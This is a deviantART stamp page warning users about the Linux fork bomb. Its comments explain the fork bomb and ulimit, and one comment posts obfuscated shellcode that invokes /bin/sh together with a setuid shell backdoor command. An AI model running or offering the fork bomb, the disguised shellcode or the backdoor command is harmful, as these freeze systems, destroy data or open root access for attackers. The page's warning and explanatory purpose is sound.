HOME | DD

AnonymousLink β€” Deadly Linux Command No. 3 by-nc-nd

Published: 2010-02-08 15:36:35 +0000 UTC; Views: 4281; Favourites: 48; Downloads: 102
Redirect to original
Description

[ anonymouslink@deviantART.com ]


$ cat /etc/description
One of the "deadly Linux commands" that some people may try to get you to execute in a console/terminal. This particular one is known as the "forkbomb", and will tell your system to execute a huge number of processes until the system freezes, which can often lead to corruption of data. SO DON'T DO IT!
$ sh /usr/bin/disclaimer
Awesomeness Β© me ^^


Related content
Comments: 19

Meztli72 [2017-09-11 04:43:05 +0000 UTC]

Destroy she said!!!
www.youtube.com/watch?v=dMgkCj…

Another version of deadly command:

char esp[] __attribute__ ((section(β€œ.text”))) /* e.s.p
release */
= β€œ\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68”
β€œ\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99”
β€œ\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7”
β€œ\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56”
β€œ\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31”
β€œ\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69”
β€œ\x6e\x2f\x73\x68\x00\x2d\x63\x00”
β€œcp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;”;

πŸ‘: 0 ⏩: 0

Meztli72 [2016-01-03 08:28:52 +0000 UTC]

LOL

πŸ‘: 0 ⏩: 0

Steelsoldat [2013-06-26 01:06:56 +0000 UTC]

i think it's great (we need more linux people )

πŸ‘: 0 ⏩: 0

Ionosphere-Negate [2011-01-18 03:32:20 +0000 UTC]

where are the first two?

πŸ‘: 0 ⏩: 0

XxkonachanxX [2010-12-02 18:29:51 +0000 UTC]

I am never typing that command. Ever.

πŸ‘: 0 ⏩: 1

AnonymousLink In reply to XxkonachanxX [2011-01-13 22:12:20 +0000 UTC]

Good idea.

πŸ‘: 0 ⏩: 1

The-Dork-King In reply to AnonymousLink [2014-08-26 02:59:01 +0000 UTC]

This explains the fork bomb, which the sites calls a denial of service attack Β www.shellhacks.com/en/HowTo-Cr…

πŸ‘: 0 ⏩: 0

znxster [2010-02-11 23:47:10 +0000 UTC]

Whilst dangerous this command is normally mitigated by default setup on systems now. See this basically attempts to spawn hundreds of processes but if the user is restricted:

$ ulimit -u
1024

Then he can only create 1024 processes (which should not kill the system). Of course if it says this:

$ ulimit -u
unlimited

Then it is dangerous as it will just continue grow until all the resources are eaten up.

For those that want to understand commands like this here is it broken down.

# Define a function called ':'
: () {

# Call function and pipe output to function
# Placing in background
: | : &

# End Function
) ;

# Call the function to start the nasty
:

Always interesting discussing these things though !

πŸ‘: 0 ⏩: 1

AnonymousLink In reply to znxster [2010-02-12 03:18:22 +0000 UTC]

I agree! Not many people would know what it ACTUALLY does.

πŸ‘: 0 ⏩: 0

Pixel-Sam [2010-02-09 19:37:12 +0000 UTC]

looks like loads of smilies XD

πŸ‘: 0 ⏩: 1

AnonymousLink In reply to Pixel-Sam [2010-02-10 02:08:55 +0000 UTC]

That's why it's dangerous. No one would think twice, right?

πŸ‘: 0 ⏩: 1

Pixel-Sam In reply to AnonymousLink [2010-02-12 12:24:55 +0000 UTC]

yh XD

πŸ‘: 0 ⏩: 0

BlackSoliloquy [2010-02-08 22:29:32 +0000 UTC]

You're ruining the fun, dude. u_u

πŸ‘: 0 ⏩: 1

AnonymousLink In reply to BlackSoliloquy [2010-02-08 23:45:00 +0000 UTC]

I, for one, like to see users come BACK to Linux. Not be scared away.

πŸ‘: 0 ⏩: 1

BlackSoliloquy In reply to AnonymousLink [2010-02-09 13:03:34 +0000 UTC]

Relax, it was just a joke.

πŸ‘: 0 ⏩: 0

raysever [2010-02-08 21:28:07 +0000 UTC]

thanks for the heads up .=]

πŸ‘: 0 ⏩: 1

AnonymousLink In reply to raysever [2010-02-08 22:12:02 +0000 UTC]

Welcome!

πŸ‘: 0 ⏩: 0

mchenry [2010-02-08 16:01:57 +0000 UTC]

Great work, great idea

πŸ‘: 0 ⏩: 1

AnonymousLink In reply to mchenry [2010-02-08 16:16:11 +0000 UTC]

Gonna be making a couple more "Deadly Linux Commands" stamps soon. xD

πŸ‘: 0 ⏩: 0